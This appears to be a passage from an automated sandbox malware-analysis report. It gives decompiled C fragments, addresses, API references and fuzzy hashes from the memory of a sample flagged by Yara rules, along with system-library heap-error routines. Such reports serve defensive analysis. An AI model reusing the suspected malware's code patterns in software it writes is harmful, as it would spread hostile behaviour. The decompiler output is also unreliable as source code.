					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                          0x00409a8b
                                          0x00409a93
                                          0x00409a95
                                          0x00409a9a
                                          0x00409a9f
                                          0x00409ab2
                                          0x00409ab7
                                          0x00409ac0
                                          0x00409acc
                                          0x00409adf
                                          0x00409ae4
                                          0x00409ae7
                                          0x00409af0
                                          0x00409b02
                                          0x00409b07
                                          0x00409b0c
                                          0x00000000
                                          0x00000000
                                          0x00409b0e
                                          0x00409b12
                                          0x00000000
                                          0x00000000
                                          0x00409b14
                                          0x00000000
                                          0x00409b12
                                          0x00409b16
                                          0x00409b19
                                          0x00409b1f
                                          0x00409b21
                                          0x00409b2c
                                          0x00409b31
                                          0x00409b34
                                          0x00409b41
                                          0x00409b4c
                                          0x00409b4e
                                          0x00409b54
                                          0x00409b58
                                          0x00409b5b
                                          0x00409b5b
                                          0x00409b62
                                          0x00409b65
                                          0x00409b6a
                                          0x00409b77
                                          0x00409aa6
                                          0x00409aa6
                                          0x00409aa6

                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                          • Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
                                          • Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
                                          • Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}





                                          0x0041a037
                                          0x0041a03c
                                          0x0041a04d
                                          0x0041a051

                                          APIs
                                          • RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: oLA
                                          • API String ID: 1279760036-3789366272
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                          0x004082f0
                                          0x004082ff
                                          0x00408303
                                          0x0040830e
                                          0x0040831e
                                          0x0040832e
                                          0x00408333
                                          0x0040833a
                                          0x0040833d
                                          0x0040834a
                                          0x0040834c
                                          0x0040834e
                                          0x0040836b
                                          0x0040836b
                                          0x00000000
                                          0x0040836d
                                          0x00408372

                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                          • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                          • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                          • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A1BA, Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A1BA(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _v117;
				int _t11;
				void* _t17;

				_v117 = ss;
				_t8 = _a4;
				E0041A950(_t17, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t8 + 0xa18)), 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t11;
			}






                                          0x0041a1bf
                                          0x0041a1c3
                                          0x0041a1da
                                          0x0041a1f0
                                          0x0041a1f4

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: f63937537095f874bde41c577ddd4811a3f2211127f3642106bf6ece8e73221a
                                          • Instruction ID: 0cd4c5b209c72a15d855f24f5b03c6a2122705e17ff76a0516630be8b3bd8a94
                                          • Opcode Fuzzy Hash: f63937537095f874bde41c577ddd4811a3f2211127f3642106bf6ece8e73221a
                                          • Instruction Fuzzy Hash: 00E092B1200204AFCB10DF94CC81EDB3769EF49350F018159FA0C97241C534E810CBB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A05C, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: f3b4911257fb0fe88d25f4ba0ce4dab4278ab6f891919f1e3138839585a13db4
                                          • Instruction ID: cc8a1e736c7c738be4cfe80ee7b513eb80c16be8f68ee34d983b0e4bdac9b935
                                          • Opcode Fuzzy Hash: f3b4911257fb0fe88d25f4ba0ce4dab4278ab6f891919f1e3138839585a13db4
                                          • Instruction Fuzzy Hash: 18E01AB5210214ABD718DF55CC45EA73769EF88750F018559B9185B242C630E9108BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a06f
                                          0x0041a077
                                          0x0041a08d
                                          0x0041a091

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                          • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                          0x0041a1da
                                          0x0041a1f0
                                          0x0041a1f4

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                          • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A092, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                          Download Yara Rule
                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: 8b839ba45e5de2ca31caf526154c56cf7d84468baf8677dfd28ba46f1db9ff3a
                                          • Instruction ID: aae21babe467a73badc997776479eec6bfc07167b798074673a407b3208e9d6e
                                          • Opcode Fuzzy Hash: 8b839ba45e5de2ca31caf526154c56cf7d84468baf8677dfd28ba46f1db9ff3a
                                          • Instruction Fuzzy Hash: E9E086755112107FD724DF18CCC5FE73BA8EF44360F118469B958DB381D935AA50CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 40%
                                          			E0041A0A0(intOrPtr _a4, void* _a8) {
				void* _t10;

				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36);
				asm("les edx, [edx+edx*2]"); // executed
				ExitProcess(??);
			}




                                          0x0041a0ba
                                          0x0041a0c5
                                          0x0041a0c8

                                          APIs
                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                          • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c8f5910f42ba6a72a3df85d8fa3c40a681f6ca6703e1de6ad89b54c510d57a68
                                          • Instruction ID: a6775bddb954c65bc7b41456e520252a1d51ca031de6e9ae270da359755978ed
                                          • Opcode Fuzzy Hash: c8f5910f42ba6a72a3df85d8fa3c40a681f6ca6703e1de6ad89b54c510d57a68
                                          • Instruction Fuzzy Hash: D1B09B719014D5C9D611D7604A4C717790477D0751F57C0A2D2020645E477CC0D1F6B5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0345B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                          Download Yara Rule
                                          Strings
                                          • *** enter .exr %p for the exception record, xrefs: 0345B4F1
                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0345B314
                                          • <unknown>, xrefs: 0345B27E, 0345B2D1, 0345B350, 0345B399, 0345B417, 0345B48E
                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0345B352
                                          • a NULL pointer, xrefs: 0345B4E0
                                          • *** Inpage error in %ws:%s, xrefs: 0345B418
                                          • *** enter .cxr %p for the context, xrefs: 0345B50D
                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0345B53F
                                          • The instruction at %p referenced memory at %p., xrefs: 0345B432
                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0345B39B
                                          • an invalid address, %p, xrefs: 0345B4CF
                                          • write to, xrefs: 0345B4A6
                                          • *** then kb to get the faulting stack, xrefs: 0345B51C
                                          • This failed because of error %Ix., xrefs: 0345B446
                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0345B2DC
                                          • *** An Access Violation occurred in %ws:%s, xrefs: 0345B48F
                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0345B2F3
                                          • The resource is owned exclusively by thread %p, xrefs: 0345B374
                                          • read from, xrefs: 0345B4AD, 0345B4B2
                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0345B484
                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0345B476
                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0345B305
                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0345B47D
                                          • The critical section is owned by thread %p., xrefs: 0345B3B9
                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0345B38F
                                          • The instruction at %p tried to %s , xrefs: 0345B4B6
                                          • The resource is owned shared by %d threads, xrefs: 0345B37E
                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0345B323
                                          • Go determine why that thread has not released the critical section., xrefs: 0345B3C5
                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0345B3D6
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                          • API String ID: 0-108210295
                                          • Opcode ID: 7f4d516b7c63368e84269876bd256e55c447177031696b106d8cbbb93ae1290c
                                          • Instruction ID: 456a1e59f9e2c29b9f0559935eb72930a93dfe65c43d27eae77661039d73b50b
                                          • Opcode Fuzzy Hash: 7f4d516b7c63368e84269876bd256e55c447177031696b106d8cbbb93ae1290c
                                          • Instruction Fuzzy Hash: 6C81B179E00210FFEB25EA069C86D6F3B25EF4BA51F44408BF9142F213D3658552CBBA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03461C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 44%
                                          			E03461C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x33848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E033AB150();
				} else {
					E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x349589c);
				E033AB150("Heap error detected at %p (heap handle %p)\n",  *0x34958a0);
				_t27 =  *0x3495898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M03461E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E033AB150();
				} else {
					E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E033AB150("Error code: %d - %s\n",  *0x3495898);
				_t113 =  *0x34958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E033AB150();
					} else {
						E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E033AB150("Parameter1: %p\n",  *0x34958a4);
				}
				_t115 =  *0x34958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E033AB150();
					} else {
						E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E033AB150("Parameter2: %p\n",  *0x34958a8);
				}
				_t117 =  *0x34958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E033AB150();
					} else {
						E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E033AB150("Parameter3: %p\n",  *0x34958ac);
				}
				_t119 =  *0x34958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E033AB150();
					} else {
						E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x34958b4);
					E033AB150("Last known valid blocks: before - %p, after - %p\n",  *0x34958b0);
				} else {
					_t120 =  *0x34958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E033AB150();
				} else {
					E033AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E033AB150("Stack trace available at %p\n", 0x34958c0);
			}











                                          0x03461c10
                                          0x03461c16
                                          0x03461c1e
                                          0x03461c3d
                                          0x03461c3e
                                          0x03461c20
                                          0x03461c35
                                          0x03461c3a
                                          0x03461c44
                                          0x03461c55
                                          0x03461c5a
                                          0x03461c65
                                          0x03461c67
                                          0x00000000
                                          0x03461c6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03461c67
                                          0x03461cdc
                                          0x03461ce5
                                          0x03461d04
                                          0x03461d05
                                          0x03461ce7
                                          0x03461cfc
                                          0x03461d01
                                          0x03461d0b
                                          0x03461d17
                                          0x03461d1f
                                          0x03461d25
                                          0x03461d30
                                          0x03461d4f
                                          0x03461d50
                                          0x03461d32
                                          0x03461d47
                                          0x03461d4c
                                          0x03461d61
                                          0x03461d67
                                          0x03461d68
                                          0x03461d6e
                                          0x03461d79
                                          0x03461d98
                                          0x03461d99
                                          0x03461d7b
                                          0x03461d90
                                          0x03461d95
                                          0x03461daa
                                          0x03461db0
                                          0x03461db1
                                          0x03461db7
                                          0x03461dc2
                                          0x03461de1
                                          0x03461de2
                                          0x03461dc4
                                          0x03461dd9
                                          0x03461dde
                                          0x03461df3
                                          0x03461df9
                                          0x03461dfa
                                          0x03461e00
                                          0x03461e0a
                                          0x03461e13
                                          0x03461e32
                                          0x03461e33
                                          0x03461e15
                                          0x03461e2a
                                          0x03461e2f
                                          0x03461e39
                                          0x03461e4a
                                          0x03461e02
                                          0x03461e02
                                          0x03461e08
                                          0x00000000
                                          0x00000000
                                          0x03461e08
                                          0x03461e5b
                                          0x03461e7a
                                          0x03461e7b
                                          0x03461e5d
                                          0x03461e72
                                          0x03461e77
                                          0x03461e95

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: 276ce3e0495aeeac1cf740d8f649aeddd4626160b3ef08dd8c6bf1468ba2124b
                                          • Instruction ID: eabb3f615d117649f688143fff80fdab840d6c5c1deb79073b7ba14556257153
                                          • Opcode Fuzzy Hash: 276ce3e0495aeeac1cf740d8f649aeddd4626160b3ef08dd8c6bf1468ba2124b
                                          • Instruction Fuzzy Hash: 1961613A925644DFD611EF88D4C6E29B3E4EB04921B1980AFF41A6F312D6349C51DB1F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033B3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E033B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E033B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E033B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E033B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E033B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E033B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L033C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L033C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E033EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E033F1370(_t276, 0x3384e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E033EBB40(0,  &_v68, _t170);
									if(L033B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
